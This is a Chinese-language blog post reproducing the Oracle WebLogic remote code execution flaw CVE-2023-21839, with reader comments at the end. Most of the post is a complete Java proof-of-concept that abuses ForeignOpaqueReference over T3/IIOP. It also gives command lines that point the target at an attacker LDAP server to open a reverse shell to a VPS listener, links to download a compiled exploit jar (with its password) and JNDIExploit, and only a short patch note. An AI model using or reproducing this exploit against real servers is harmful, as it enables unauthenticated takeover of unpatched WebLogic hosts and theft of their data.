Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

漏洞空间 • 2023-02-25 • CMS漏洞, 漏洞复现POC

WebLogic 存在远程代码执行漏洞（CVE-2023-21839/CNVD-2023-04389），由于Weblogic IIOP/T3协议存在缺陷，当IIOP/T3协议开启时，允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server，漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

影响范围

WebLogic_Server = 12.2.1.3.0
WebLogic_Server = 12.2.1.4.0
WebLogic_Server = 14.1.1.0.0

危害级别：高

CNVD-2023-04389
CVE-2023-21839

漏洞复现

安装环境

WebLogic_Server = 12.2.1.3.0

安装可参考如下链接https://blog.csdn.net/m0_67391907/article/details/126553673

环境安装完成访问如图:

Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

由于Weblogic t3/iiop协议支持远程绑定对象bind到服务端，并且可以通过lookup查看，当远程对象继承自OpaqueReference时，lookup查看远程对象，服务端会调用远程对象getReferent方法。weblogic.deployment.jms.ForeignOpaqueReference继承自OpaqueReference并且实现了getReferent方法，并且存在retVal = context.lookup(this.remoteJNDIName)实现，故可以通过rmi/ldap远程协议进行远程命令执行。

复现步骤

1.新建java项目，并写入poc文件

POC代码如下:

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE="[*]java -jar 目标ip:端口 ldap地址ne.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    private static InitialContext getInitialContext(String url)throws NamingException
    {
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
    public static void main(String args[]) throws Exception {
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c=getInitialContext("t3://"+t3Url);
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
        try{
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }

    }
}

请自行编译上述POC代码，如有需要文章最后会给出编译好的JAR文件

测试DNSlog出网，生成域名

java -jar Weblogic-CVE-2023-21839.jar 192.168.200.5:7001 ldap://pktnfv.dnslog.cn

漏洞执行情况

使用JNDIExploit-1.4-SNAPSHOT.jar工具启动ladp服务

加载漏洞利用poc

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip(VPS的IP地址)

使用nc监听反弹端口

在本机上执行漏洞利用代码

java -jar Weblogic-CVE-2023-21839.jar 192.168.200.5:7001 ldap://vsp的ip地址:1389/Basic/ReverseShell/vsp的ip地址/VPS的nc监听端口

JNDI有连接进入,大概几秒后会获取shell

NC获的shell如图:

修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

缓解方式禁用 T3 及 IIOP

下载地址汇总:

补丁下载链接：

https://support.oracle.com/rs?type=doc&id=2917213.2

注:weblogic安装在windows此方法无发使用

Weblogic-CVE-2023-21839.jar下载:

https://github.com/WhiteHSBG/JNDIExploitWeblogic-CVE-2023-21839.jar

NC下载地址:

https://nmap.org/dist/ncat-portable-5.59BETA1.zip

编译好的POC jar文件下载地址:(解压密码xsssql)

http://www.xsssql.com/wp-content/uploads/2023/02/Weblogic-CVE-2023-21839.rar

参考链接

https://github.com/DXask88MA/Weblogic-CVE-2023-21839
https://github.com/WhiteHSBG/JNDIExploit
https://github.com/4ra1n/CVE-2023-21839

THE END

cve CVE-2023-21839 WEBLOGIC

二维码

海报

Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

WebLogic 存在远程代码执行漏洞（CVE-2023-21839/CNVD-2023-04389），由于Weblogic IIOP/T3协议存在缺陷，当IIOP/T3协议开启时，允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Ser……

Joomla(CVE-2023-23752)漏洞复现-一个请求参数打穿Rest API

<<上一篇

dockert安装weblogic

下一篇>>

发表评论

回复 zero 取消回复

共有 3 条评论

zero

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
大佬，编译好的POC 解压密码是什么？

2023-03-15 11:07 回复
1. weblcx@zero
  
  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
  你好，编译好的解压密码是xsssql
  
  2023-03-15 11:12 回复
2. 漏洞空间@zero
  
  Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
  你好，编译好的解压密码是xsssql
  
  2023-06-04 19:26 回复

搜索内容

Weblogic远程代码执行CVE-2023-21839/CNVD-2023-04389漏洞复现

回复 zero 取消回复

共有 3 条评论

归档

分类